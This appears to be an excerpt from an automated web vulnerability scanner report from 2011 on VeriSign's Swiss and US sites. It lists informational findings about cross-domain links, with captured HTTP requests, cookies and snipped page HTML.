<script type="text/JavaScript" src="http://cdn.verisign.com/stellent/fragments/vrsnJSAssets/seal.js" language="JavaScript"></script>

<script type="text/JavaScript" src="//www.verisign.com/hp07/j/swfobj.js">

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
...[SNIP]...
<!--HEADER ASSETS-->
       <link href="http://cdn.verisign.com/assets/shared/css/header.css" rel="stylesheet" />
       <!--[if lte IE 7]>
...[SNIP]...
<meta http-equiv="X-UA-Compatible" content="IE=7" />
       <link rel="shortcut icon" href="http://cdn.verisign.com/authweb/global/assets/shared/images/favicon.ico" type="image/x-icon" />

       
       <script type="text/javascript">
...[SNIP]...
</script>

       <script type="text/javascript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/global-preload.js"></script>
       <link href="http://cdn.verisign.com/authweb/global/assets/shared/css/shared.css" rel="stylesheet" />

       <!--[if IE 6]>
...[SNIP]...
<a href="/?tid=header-logo" title="Now from Symantec - VeriSign Authentication Services"><img src="http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_symc-auth_logo.png" /></a>
...[SNIP]...
<li><a href='//www.verisign.com/ar/'>Argentina</a>
...[SNIP]...
<li><a href='//www.verisign.com.au/'>Australia</a>
...[SNIP]...
<li><a href='//www.verisign.com.br/'>Brazil</a>
...[SNIP]...
<li><a href='//www.verisign.com/ca/'>Canada</a>
...[SNIP]...
<li><a href='//www.verisign.com/cl/'>Chile</a>
...[SNIP]...
<li><a href='//www.verisignchina.com.cn/'>China</a>
...[SNIP]...
<li><a href='//www.verisign.com.hk/'>Hong Kong</a>
...[SNIP]...
<li><a href='//www.verisign.co.jp/'>Japan</a>
...[SNIP]...
<li><a href='//www.verisign.com/latinamerica/esp/'>Latin America</a>
...[SNIP]...
<li><a href='//www.verisign.com/mx/'>Mexico</a>
...[SNIP]...
<li><a href='//www.verisign.com/nl/'>Netherlands</a>
...[SNIP]...
<li><a href='//www.verisign.co.nz/'>New Zealand</a>
...[SNIP]...
<li><a href='//www.verisign.com.sg/'>Singapore</a>
...[SNIP]...
<li><a href='//www.verisign.com.tw/'>Taiwan</a>
...[SNIP]...
<li><a href='//www.verisign.com/'>United States</a>
...[SNIP]...
<li><a href='//www.verisign.co.uk/'>United Kingdom</a>
...[SNIP]...
<div id="header_seal">
                       <script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.verisign.ch&amp;size=S&amp;use_flash=YES&amp;use_transparent=YES&amp;lang=en"></script>
                       <noscript>
                           <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="https://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0" id="s_s" align="" height="72" width="100">
                               <param name="movie" value="https://seal.verisign.com/getseal?at=1&amp;sealid=2&amp;dn=www.verisign.ch&amp;lang=en">
...[SNIP]...
<param name="allowScriptAccess" value="always">
                               <embed src="https://seal.verisign.com/getseal?at=1&amp;sealid=2&amp;dn=www.verisign.ch&amp;lang=en" loop="false" menu="false" quality="best" wmode="transparent" swliveconnect="FALSE" name="s_s" type="application/x-shockwave-flash" pluginspage="https://www.macromedia.com/go/getflashplayer" allowscriptaccess="always" align="" height="72" width="100"/>
                           </object>
...[SNIP]...
<li><a href='//www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html?tid=gnps'>Two-Factor Authentication</a>
...[SNIP]...
<li><a href='//www.verisign.co.uk/authentication/enterprise-authentication/pki-infrastructure-solutions/index.html?tid=gnps'>Public Key Infrastructure (PKI) Services</a>
...[SNIP]...
<li><a href='//www.verisign.co.uk/authentication/individual-authentication/digital-id/?tid=gnps'>Digital IDs for Secure Email</a>
...[SNIP]...
<li><a href='//www.verisign.co.uk/authentication/consumer-authentication/vip-fraud-detection-services/index.html?tid=gn-i_need_to'>Detect Fraud Online</a>
...[SNIP]...
<a href="/ssl/free-trial/index.html?tid=gnps-promo" class="promo-link"><img src="http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_ps-freetrial-promo.jpg" alt="Try VeriSign SSL or VeriSign Trust Seal - FREE!" width="170" height="183" /></a>
...[SNIP]...
<p class="small"><a rel="external" href="//verisign.com/partnersupport/worldwide/partnersupport.html">Email support for login help.</a>
...[SNIP]...
</div>
   <a href="//www.verisign.com/partners/ssl-reseller-programs/featured-ssl-partners/index.html?tid=gnpartners-promo" class="promo-link"><img src="http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_partners-featured-ssl-promo.jpg" alt="See all Featured SSL Partners" width="170" height="231" /></a>
...[SNIP]...
<li><a href='https://knowledge.verisign.ch/support/ssl-certificates-support/index.html?tid=gnpsupport'>SSL Certificates Support</a>
...[SNIP]...
<li><a href='https://knowledge.verisign.ch/support/trust-seal-support/index.html?tid=gnpsupport'>VeriSign Trust&trade; Seal Support</a>
...[SNIP]...
<li><a href='https://knowledge.verisign.ch/support/code-signing-support/index.html?tid=gnpsupport'>Code Signing Support</a>
...[SNIP]...
<li><a href='https://knowledge.verisign.ch/support/digital-id-support/index.html?tid=gnsupport'>Digital IDs for Secure Email Support</a>
...[SNIP]...
<li><a href='https://knowledge.verisign.ch/support/mpki-support/index.html?tid=gnsupport'>Managed PKI Support</a>
...[SNIP]...
</div>
   <a href="https://knowledge.verisign.ch/support/ssl-certificates-support/index.html?tid=gnpsupport-promo" class="promo-link"><img src="http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_support-promo.jpg" alt="24/7 help with your SSL Certificates. Try the Knowledge Base." width="170" height="183" /></a>
...[SNIP]...
<li><a href='https://ssl-certificate-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH'>VeriSign Trust Center Sign In</a>
...[SNIP]...
<li><a href='https://trust-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH'>VeriSign Trust Center Sign In</a>
...[SNIP]...
<li><a href='https://cc-admin.geotrust.com/geocenter/reseller/logon.do'>Code Signing Portal for Microsoft Windows Mobile Sign In</a>
...[SNIP]...
<li><a href='https://products.verisign.com/geocenter/reseller/logon.do'>VeriSign Partner Center Sign In</a>
...[SNIP]...
<li><a href="//www.symantec.com/de/ch/about/news/release/index.jsp">News</a>
       <ul>
           <li><a href="//press.verisign.com/">Press Release Archives</a>
...[SNIP]...
<li><a href="//www.verisign.com/press/awards/index.html">Awards</a></li>
   <li><a href="//blogs.verisign.com/">Blogs</a></li>
<li><a href="//www.verisign.com/verisign-worldwide/index.html">Worldwide Sites</a>
...[SNIP]...
<div id="emailPrint" class="emailPrint">
<a class="addthis_button_email" href="//www.addthis.com/bookmark.php?v=250"><img style="margin-bottom: 0px;" src="/assets/shared/images/dev044079.gif" alt="Email">
...[SNIP]...
</script>
<script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js?username=verisign">
</script>
...[SNIP]...
<div id="playerTVAD">
   

        <script src="http://player.ooyala.com/player.js?callback=receiveOoyalaEvent&playerId=ooyalaPlayer_44h86_g6tvkk69&width=488&height=335&embedCode=5rbzB2MTrK9lAvHdEslUi3qJGrQInV_c&wmode=transparent">
</script>
<noscript>
   <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="ooyalaPlayer_44h86_g6tvkk69" width="488" height="335" codebase="https://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab">
       <param name="wmode" value="transparent" />
...[SNIP]...
<param name="flashvars" value="embedType=directObjectTag&embedCode=5rbzB2MTrK9lAvHdEslUi3qJGrQInV_c
" />
    <embed src="http://player.ooyala.com/player.swf?embedCode=5rbzB2MTrK9lAvHdEslUi3qJGrQInV_c&version=2" bgcolor="#000000" width="488" height="335" name="ooyalaPlayer_44h86_g6tvkk69" align="middle" play="true" loop="false" allowscriptaccess="always" allowfullscreen="true" type="application/x-shockwave-flash" flashvars="&embedCode=5rbzB2MTrK9lAvHdEslUi3qJGrQInV_c" pluginspage="https://www.adobe.com/go/getflashplayer">
    </embed>
...[SNIP]...
<p>
VeriSign Authentication Services, now part of <a href="http://www.symantec.com">Symantec Corp.</a>
...[SNIP]...
<p>If you are looking for Information on Domain Name Services, DDoS Protection, Managed DNS, or iDefense Security Intelligence Services, please visit <a href="http://www.verisigninc.com/en_CH/index.xhtml?loc=en_CH">VeriSign Inc.</a>
...[SNIP]...
<p style="margin-bottom:20px;"><a href="http://www.symantec.com/business/theme.jsp?themeid=vs"><img src="/assets/corp/images/about-verisign-772x127.jpg" alt="VeriSign's Identity and Authentication Security Business is Now Part of Symantec." title="VeriSign's Identity and Authentication Security
...[SNIP]...
<li><a href="//www.symantec.com/about/news/release/article.jsp?prid=20100809_01">Press Release</a>
...[SNIP]...
<li><a href="//www.symantec.com/content/en/us/enterprise/other_resources/b-verisign_faq.pdf">FAQ</a>
...[SNIP]...
<li><a href="//investor.symantec.com/phoenix.zhtml?c=89422&p=irol-EventDetails&EventId=3096751">Replay Webcast</a>
...[SNIP]...
<li><a href="//www.symantec.com/about/careers/index.jsp">Symantec Careers</a>
...[SNIP]...
<li><a href="https://www4.symantec.com/events/controller?c=listing">Symantec Events</a>
...[SNIP]...
<li><a href="//investor.symantec.com/phoenix.zhtml?c=89422&p=irol-irhomeNews">Symantec Investor Relations</a>
...[SNIP]...
<li><a href="//www.youtube.com/verisignauth"><img src="/assets/corp/images/youtube_logo.gif" alt="YouTube">
...[SNIP]...
<li style="padding-left:50px"><a href="//www.facebook.com/VeriSignAuthentication"><img src="/assets/corp/images/facebook_logo.gif" alt="facebook">
...[SNIP]...
<li style="padding-left:50px"><a href="//twitter.com/verisign"><img src="/assets/corp/images/twitter_logo.gif" alt="Twitter">
...[SNIP]...
<li style="padding-left:51px"><a href="//blogs.verisign.com/"><img src="/assets/corp/images/blog_icon.gif" alt="Blogs">
...[SNIP]...
</div>
                   <a href="//www.verisigninc.com/en_CH/index.xhtml?loc=en_CH" rel="external"><img class="namingPromo" src="/assets/naming/images/naming_promo.gif" alt="Discover the Brand New Look of Verisign - Domain Name Services, Network Intelligence, and DNS Availability are now at verisign
...[SNIP]...
<li><a href='http://www.symantec.com/de/ch/about/news/release/index.jsp'>News</a></li><li><a href='//blogs.verisign.com/?tid=footer'>Blogs</a>
...[SNIP]...
<li><a href='//www.verisign.com/verisign-worldwide/index.html?tid=footer'>Worldwide Sites</a>
...[SNIP]...
<p>VeriSign Authentication Services, now part of <a href='http://www.symantec.com' rel='external'>Symantec Corp.</a>
...[SNIP]...
</a>, <a href='//www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html'>two-factor authentication</a>, <a href='//www.verisign.co.uk/authentication/consumer-authentication/identity-protection/index.html'>identity protection</a>
...[SNIP]...
</a> and <a href='//www.verisign.co.uk/authentication/enterprise-authentication/pki-infrastructure-solutions/index.html?tid=gnps'>public key infrastructure</a> (<a href='//www.verisign.co.uk/authentication/enterprise-authentication/managed-pki/index.html'>PKI</a>). Symantec products include <a href='http://ch.norton.com/'>Norton AntiVirus software</a>, <a href='http://smallbusiness.norton.com'>Norton Internet Security solutions for small business</a>, and <a href='http://www.pctools.com/de/'>PC Tools</a>
...[SNIP]...
</div>

       <script type="text/javascript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js"></script>
       <script type="text/javascript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/shared.js?082911"></script>

                   <script type="text/javascript" src="http://cdn.verisign.com/authweb/en_ch/assets/shared/js/google-analytics.js"></script>
...[SNIP]...
<![endif]-->

<script type="text/javascript" src="http://cdn.verisign.com/assets/shared/js/curvycorners.js"></script>
...[SNIP]...

14.67. http://www.verisign.ch/trust-seal/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verisign.ch
Path:   /trust-seal/index.html

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /trust-seal/index.html?tid=gnps HTTP/1.1
Host: www.verisign.ch
Proxy-Connection: keep-alive
Referer: http://www.verisign.ch/corporate/index.html?tid=footer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=85AC46EBE3E5BE40; mbox=check#true#1315621625|session#1315621535113-743172#1315623425|PC#1315621455064-973488.19#1378693568; __utma=173548476.138500938.1315621535.1315621535.1315621535.1; __utmb=173548476.3.10.1315621535; __utmc=173548476; __utmz=173548476.1315621535.1.1.utmcsr=query.verisign.com|utmccn=(referral)|utmcmd=referral|utmcct=/search

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html
Content-Length: 50059

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>VeriSign Trust Seal - Perfec
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<link rel="stylesheet" href="//www.verisign.com/stellent/fragments/vrsncssassets/vrsnStyles.css" type="text/css" />
<link rel="stylesheet" href="/assets/partners/css/styles.css" type="text/css" />
...[SNIP]...
</script>


<script type="text/JavaScript" src="https://www.verisign.com/js/mbox.js"></script>
...[SNIP]...
<noscript><iframe src="//view.atdmt.com/iaction/slctsl_2010Q2TrustSeal_1" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0"></iframe>
...[SNIP]...
<!--HEADER ASSETS-->
       <link href="http://cdn.verisign.com/assets/shared/css/header.css" rel="stylesheet" />
       <!--[if lte IE 7]>
...[SNIP]...
<meta http-equiv="X-UA-Compatible" content="IE=7" />
       <link rel="shortcut icon" href="http://cdn.verisign.com/authweb/global/assets/shared/images/favicon.ico" type="image/x-icon" />

       
       <script type="text/javascript">
...[SNIP]...
</script>

       <script type="text/javascript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/global-preload.js"></script>
       <link href="http://cdn.verisign.com/authweb/global/assets/shared/css/shared.css" rel="stylesheet" />

       <!--[if IE 6]>
...[SNIP]...
<a href="/?tid=header-logo" title="Now from Symantec - VeriSign Authentication Services"><img src="http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_symc-auth_logo.png" /></a>
...[SNIP]...
<li><a href='//www.verisign.com/ar/'>Argentina</a>
...[SNIP]...
<li><a href='//www.verisign.com.au/'>Australia</a>
...[SNIP]...
<li><a href='//www.verisign.com.br/'>Brazil</a>
...[SNIP]...
<li><a href='//www.verisign.com/ca/'>Canada</a>
...[SNIP]...
<li><a href='//www.verisign.com/cl/'>Chile</a>
...[SNIP]...
<li><a href='//www.verisignchina.com.cn/'>China</a>
...[SNIP]...
<li><a href='//www.verisign.com.hk/'>Hong Kong</a>
...[SNIP]...
<li><a href='//www.verisign.co.jp/'>Japan</a>
...[SNIP]...
<li><a href='//www.verisign.com/latinamerica/esp/'>Latin America</a>
...[SNIP]...
<li><a href='//www.verisign.com/mx/'>Mexico</a>
...[SNIP]...
<li><a href='//www.verisign.com/nl/'>Netherlands</a>
...[SNIP]...
<li><a href='//www.verisign.co.nz/'>New Zealand</a>
...[SNIP]...
<li><a href='//www.verisign.com.sg/'>Singapore</a>
...[SNIP]...
<li><a href='//www.verisign.com.tw/'>Taiwan</a>
...[SNIP]...
<li><a href='//www.verisign.com/'>United States</a>
...[SNIP]...
<li><a href='//www.verisign.co.uk/'>United Kingdom</a>
...[SNIP]...
<div id="header_seal">
                       <script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.verisign.ch&amp;size=S&amp;use_flash=YES&amp;use_transparent=YES&amp;lang=en"></script>
                       <noscript>
                           <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="https://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0" id="s_s" align="" height="72" width="100">
                               <param name="movie" value="https://seal.verisign.com/getseal?at=1&amp;sealid=2&amp;dn=www.verisign.ch&amp;lang=en">
...[SNIP]...
<param name="allowScriptAccess" value="always">
                               <embed src="https://seal.verisign.com/getseal?at=1&amp;sealid=2&amp;dn=www.verisign.ch&amp;lang=en" loop="false" menu="false" quality="best" wmode="transparent" swliveconnect="FALSE" name="s_s" type="application/x-shockwave-flash" pluginspage="https://www.macromedia.com/go/getflashplayer" allowscriptaccess="always" align="" height="72" width="100"/>
                           </object>
...[SNIP]...
<li><a href='//www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html?tid=gnps'>Two-Factor Authentication</a>
...[SNIP]...
<li><a href='//www.verisign.co.uk/authentication/enterprise-authentication/pki-infrastructure-solutions/index.html?tid=gnps'>Public Key Infrastructure (PKI) Services</a>
...[SNIP]...
<li><a href='//www.verisign.co.uk/authentication/individual-authentication/digital-id/?tid=gnps'>Digital IDs for Secure Email</a>
...[SNIP]...
<li><a href='//www.verisign.co.uk/authentication/consumer-authentication/vip-fraud-detection-services/index.html?tid=gn-i_need_to'>Detect Fraud Online</a>
...[SNIP]...
<a href="/ssl/free-trial/index.html?tid=gnps-promo" class="promo-link"><img src="http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_ps-freetrial-promo.jpg" alt="Try VeriSign SSL or VeriSign Trust Seal - FREE!" width="170" height="183" /></a>
...[SNIP]...
<p class="small"><a rel="external" href="//verisign.com/partnersupport/worldwide/partnersupport.html">Email support for login help.</a>
...[SNIP]...
</div>
   <a href="//www.verisign.com/partners/ssl-reseller-programs/featured-ssl-partners/index.html?tid=gnpartners-promo" class="promo-link"><img src="http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_partners-featured-ssl-promo.jpg" alt="See all Featured SSL Partners" width="170" height="231" /></a>
...[SNIP]...
<li><a href='https://knowledge.verisign.ch/support/ssl-certificates-support/index.html?tid=gnpsupport'>SSL Certificates Support</a>
...[SNIP]...
<li><a href='https://knowledge.verisign.ch/support/trust-seal-support/index.html?tid=gnpsupport'>VeriSign Trust&trade; Seal Support</a>
...[SNIP]...
<li><a href='https://knowledge.verisign.ch/support/code-signing-support/index.html?tid=gnpsupport'>Code Signing Support</a>
...[SNIP]...
<li><a href='https://knowledge.verisign.ch/support/digital-id-support/index.html?tid=gnsupport'>Digital IDs for Secure Email Support</a>
...[SNIP]...
<li><a href='https://knowledge.verisign.ch/support/mpki-support/index.html?tid=gnsupport'>Managed PKI Support</a>
...[SNIP]...
</div>
   <a href="https://knowledge.verisign.ch/support/ssl-certificates-support/index.html?tid=gnpsupport-promo" class="promo-link"><img src="http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_support-promo.jpg" alt="24/7 help with your SSL Certificates. Try the Knowledge Base." width="170" height="183" /></a>
...[SNIP]...
<li><a href='https://ssl-certificate-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH'>VeriSign Trust Center Sign In</a>
...[SNIP]...
<li><a href='https://trust-center.verisign.ch/process/retail/console_login?application_locale=VRSN_CH'>VeriSign Trust Center Sign In</a>
...[SNIP]...
<li><a href='https://cc-admin.geotrust.com/geocenter/reseller/logon.do'>Code Signing Portal for Microsoft Windows Mobile Sign In</a>
...[SNIP]...
<li><a href='https://products.verisign.com/geocenter/reseller/logon.do'>VeriSign Partner Center Sign In</a>
...[SNIP]...
<div id="emailPrint" class="emailPrint">
<a class="addthis_button_email" href="//www.addthis.com/bookmark.php?v=250"><img style="margin-bottom: 0px;" src="/assets/shared/images/dev044079.gif" alt="Email">
...[SNIP]...
</script>
<script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js?username=verisign">
</script>
...[SNIP]...
</p>
<a href="http://www.verisign.com/trust-seal/resources/case-studies/myenergysolution/index.html">Learn more</a>
...[SNIP]...
<img src="/assets/trust-seal/images/TrustSeal.png" alt="" />
   <a class="ts_home_try headertext" href="https://ssl-certificate-center.verisign.com/process/retail/trustseal_trial_initial?application_locale=VRSN_CH">Free 60-day trial
<span class="smalltext">
...[SNIP]...
</a>
<a class="ts_home_buy headertext" href="https://trust-center.verisign.ch/process/retail/trust_initial?application_locale=VRSN_CH">Buy now</a>
<a class="ts_home_buy headertext" href="https://trust-center.verisign.ch/process/retail/console_login?application_locale=VTC_CH">Renew</a>
...[SNIP]...
</p>
<a href="http://www.verisign.com/trust-seal/resources/case-studies/billtiger/index.html">Learn more</a>
...[SNIP]...
<img src="/assets/trust-seal/images/TrustSeal.png" alt="" />
   <a class="ts_home_try headertext" href="https://ssl-certificate-center.verisign.com/process/retail/trustseal_trial_initial?application_locale=VRSN_CH">Free 60-day trial
<span class="smalltext">
...[SNIP]...
</a>
<a class="ts_home_buy headertext" href="https://trust-center.verisign.ch/process/retail/trust_initial?application_locale=VRSN_CH">Buy now</a>
<a class="ts_home_buy headertext" href="https://trust-center.verisign.ch/process/retail/console_login?application_locale=VTC_CH">Renew</a>
...[SNIP]...
</p>
<a href="http://www.verisign.com/trust-seal/resources/case-studies/globalvillage/index.html">Learn more</a>
...[SNIP]...
<img src="/assets/trust-seal/images/TrustSeal.png" alt="" />
   <a class="ts_home_try headertext" href="https://ssl-certificate-center.verisign.com/process/retail/trustseal_trial_initial?application_locale=VRSN_CH">Free 60-day trial
<span class="smalltext">
...[SNIP]...
</a>
<a class="ts_home_buy headertext" href="https://trust-center.verisign.ch/process/retail/trust_initial?application_locale=VRSN_CH">Buy now</a>
<a class="ts_home_buy headertext" href="https://trust-center.verisign.ch/process/retail/console_login?application_locale=VTC_CH">Renew</a>
...[SNIP]...
</p>
<a href="http://www.verisign.com/trust-seal/resources/case-studies/trademark-company/index.html">Learn more</a>
...[SNIP]...
<img src="/assets/trust-seal/images/TrustSeal.png" alt="" />
   <a class="ts_home_try headertext" href="https://ssl-certificate-center.verisign.com/process/retail/trustseal_trial_initial?application_locale=VRSN_CH">Free 60-day trial
<span class="smalltext">
...[SNIP]...
</a>
<a class="ts_home_buy headertext" href="https://trust-center.verisign.ch/process/retail/trust_initial?application_locale=VRSN_CH">Buy now</a>
<a class="ts_home_buy headertext" href="https://trust-center.verisign.ch/process/retail/console_login?application_locale=VTC_CH">Renew</a>
...[SNIP]...
<div id="vid_container">


<script src="http://player.ooyala.com/player.js?width=356&height=224&embedCode=w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG&wmode=transparent">
</script>
<noscript>
<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" id="ooyalaPlayer_nezp_gh3eobtg" width="356" height="224" codebase="http://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab">
<param name="movie" value="http://player.ooyala.com/player.swf?embedCode=w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG&version=2" />
...[SNIP]...
<param name="wmode" value="transparent" />
       <embed src="http://player.ooyala.com/player.swf?embedCode=w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG&version=2" bgcolor="#000000" width="356" height="224" name="ooyalaPlayer_nezp_gh3eobtg" align="middle" play="true" loop="false" allowscriptaccess="always" allowfullscreen="true" type="application/x-shockwave-flash" flashvars="&embedCode=w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG" pluginspage="http://www.adobe.com/go/getflashplayer">
</embed>
...[SNIP]...
<p style="width:210px;">
Contact Sales at 0800 56 29 24 or +41 26 429 7929 or <a href="https://www.verisign.com/cgi-bin/go.cgi?a=w18550112675251018">submit an inquiry online</a>
...[SNIP]...
</p>
<script type="text/javascript" src="http://cdn.verisign.com/stellent/fragments/www_chatNow/zig.js"></script>
...[SNIP]...
<div id="logos" class="floatl">
<a href="http://www.facebook.com/VeriSignAuthentication"><img src="/assets/trust-seal/images/Facebook.png" alt="Facebook" style="margin-left:34px; margin-right:37px;"/></a><a href="http://www.twitter.com/TrustSeal"><img src="/assets/trust-seal/images/Twitter.png" alt="Twitter" style="margin-right:37px;"/></a><a href="http://www.youtube.com/user/VeriSignAuth"><img src="/assets/trust-seal/images/YouTube.png" alt="YouTube" />
...[SNIP]...
<!--HEADER ASSETS-->
       <link href="http://cdn.verisign.com/assets/shared/css/header.css" rel="stylesheet" />
       <!--[if lte IE 7]>
...[SNIP]...
<meta http-equiv="X-UA-Compatible" content="IE=7" />
       <link rel="shortcut icon" href="http://cdn.verisign.com/authweb/global/assets/shared/images/favicon.ico" type="image/x-icon" />

       
       <script type="text/javascript">
...[SNIP]...
</script>

       <script type="text/javascript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/global-preload.js"></script>
       <link href="http://cdn.verisign.com/authweb/global/assets/shared/css/shared.css" rel="stylesheet" />

       <!--[if IE 6]>
...[SNIP]...
<li><a href='http://www.symantec.com/de/ch/about/news/release/index.jsp'>News</a></li><li><a href='//blogs.verisign.com/?tid=footer'>Blogs</a>
...[SNIP]...
<li><a href='//www.verisign.com/verisign-worldwide/index.html?tid=footer'>Worldwide Sites</a>
...[SNIP]...
<p>VeriSign Authentication Services, now part of <a href='http://www.symantec.com' rel='external'>Symantec Corp.</a>
...[SNIP]...
</a>, <a href='//www.verisign.co.uk/authentication/consumer-authentication/two-factor-authentication/index.html'>two-factor authentication</a>, <a href='//www.verisign.co.uk/authentication/consumer-authentication/identity-protection/index.html'>identity protection</a>
...[SNIP]...
</a> and <a href='//www.verisign.co.uk/authentication/enterprise-authentication/pki-infrastructure-solutions/index.html?tid=gnps'>public key infrastructure</a> (<a href='//www.verisign.co.uk/authentication/enterprise-authentication/managed-pki/index.html'>PKI</a>). Symantec products include <a href='http://ch.norton.com/'>Norton AntiVirus software</a>, <a href='http://smallbusiness.norton.com'>Norton Internet Security solutions for small business</a>, and <a href='http://www.pctools.com/de/'>PC Tools</a>
...[SNIP]...
</div>

       <script type="text/javascript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js"></script>
       <script type="text/javascript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/shared.js?082911"></script>

                   <script type="text/javascript" src="http://cdn.verisign.com/authweb/en_ch/assets/shared/js/google-analytics.js"></script>
...[SNIP]...
<![endif]-->

<script type="text/javascript" src="http://cdn.verisign.com/assets/shared/js/curvycorners.js"></script>
...[SNIP]...
<!-- Promo script-->
<script type="text/JavaScript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/rotator.js">
</script>
...[SNIP]...
<!-- Pre-load promo images to display correctly in promo-->
<script type="text/JavaScript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js">
</script>
...[SNIP]...

14.68. http://www.verisign.com/code-signing/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verisign.com
Path:   /code-signing/index.html

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /code-signing/index.html?tid=a_box HTTP/1.1
Host: www.verisign.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=6A3B7886DB2A10DB4D019F6CAED9DACC; mbox=session#1315621455064-973488#1315623513|PC#1315621455064-973488.19#1378693653|check#true#1315621713; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.6.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:27:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Sun, 09 Oct 2011 21:27:08 GMT
Content-Type: text/html
Content-Length: 103179

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

   <!--HEADER ASSETS
...[SNIP]...
<li><a href='//www.verisign.be/'>Belgium</a>
...[SNIP]...
<li><a href='//www.verisignchina.com.cn/'>China</a>
...[SNIP]...
<li><a href='//www.verisign.dk/'>Denmark</a>
...[SNIP]...
<li><a href='//www.verisign.fr/'>France</a>
...[SNIP]...
<li><a href='//www.verisign.de/'>Germany</a>
...[SNIP]...
<li><a href='//www.verisign.in/'>India</a>
...[SNIP]...
<li><a href='//www.verisign.it/'>Italy</a>
...[SNIP]...
<li><a href='//www.verisign.es/'>Spain</a>
...[SNIP]...
<li><a href='//www.verisign.se/'>Sweden</a>
...[SNIP]...
<li><a href='//www.verisign.ch/'>Switzerland</a>
...[SNIP]...
<li><a href="http://www.symantec.com/business/theme.jsp?themeid=contact-verisign">Contact VeriSign</a>
...[SNIP]...
<noscript>
                           <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="https://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=5,0,0,0" id="s_s" align="" height="72" width="100">
                               <param name="movie" value="https://seal.verisign.com/getseal?at=1&amp;sealid=2&amp;dn=www.verisign.com&amp;lang=en">
...[SNIP]...
